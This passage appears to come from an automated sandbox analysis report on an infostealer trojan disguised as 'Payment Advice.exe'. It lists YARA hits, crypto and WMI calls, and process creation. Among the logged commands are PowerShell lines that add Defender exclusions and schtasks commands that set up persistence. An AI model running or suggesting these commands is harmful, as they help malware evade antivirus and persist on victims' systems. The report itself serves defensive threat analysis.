                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_068255C019_2_068255C0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_0682B32E19_2_0682B32E
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_0682C1B019_2_0682C1B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_068276B019_2_068276B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_06825CFF19_2_06825CFF
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_0682E3D019_2_0682E3D0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_0682004019_2_06820040
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_06911DB819_2_06911DB8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_06911DC819_2_06911DC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_0682003319_2_06820033
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_012E28C820_2_012E28C8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534E07020_2_0534E070
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534E98620_2_0534E986
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534D55020_2_0534D550
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534E04220_2_0534E042
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534ED5820_2_0534ED58
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534EDD320_2_0534EDD3
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0117EA7025_2_0117EA70
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0117ACD825_2_0117ACD8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_011741F825_2_011741F8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0117A51025_2_0117A510
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_01174AC825_2_01174AC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_01173EB025_2_01173EB0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0689660825_2_06896608
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0689B32E25_2_0689B32E
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0689348025_2_06893480
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06897D9025_2_06897D90
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0689C1B025_2_0689C1B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_068955C025_2_068955C0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_068976B025_2_068976B0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0689E3D025_2_0689E3D0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0689004025_2_06890040
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06895D1025_2_06895D10
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06981DC825_2_06981DC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06981DC325_2_06981DC3
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0689003E25_2_0689003E
                    Source: Payment Advice.exeStatic PE information: invalid certificate
                    Source: Payment Advice.exe, 00000000.00000002.1706697674.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1710843743.00000000031E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename935d4343-3e00-439b-b10a-ff974a5f8529.exe4 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000000.1645353775.0000000000AB8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLtIh.exe< vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1720871520.000000000B470000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1720188330.0000000008EC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1710843743.0000000002F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.00000000048E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename935d4343-3e00-439b-b10a-ff974a5f8529.exe4 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000008.00000002.4116527914.0000000000CF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Payment Advice.exe
                    Source: Payment Advice.exeBinary or memory string: OriginalFilenameLtIh.exe< vs Payment Advice.exe
                    Source: Payment Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sFPEKzHsLkYZIz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, k8kSUDwarKJEU7Xa30.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, k8kSUDwarKJEU7Xa30.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/20@2/2
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: \Sessions\1\BaseNamedObjects\ulmOXmclEpqFJLBfFWotANyak
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6619.tmpJump to behavior
                    Source: Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Payment Advice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Payment Advice.exeReversingLabs: Detection: 39%
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile read: C:\Users\user\Desktop\Payment Advice.exe:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"Jump to behavior
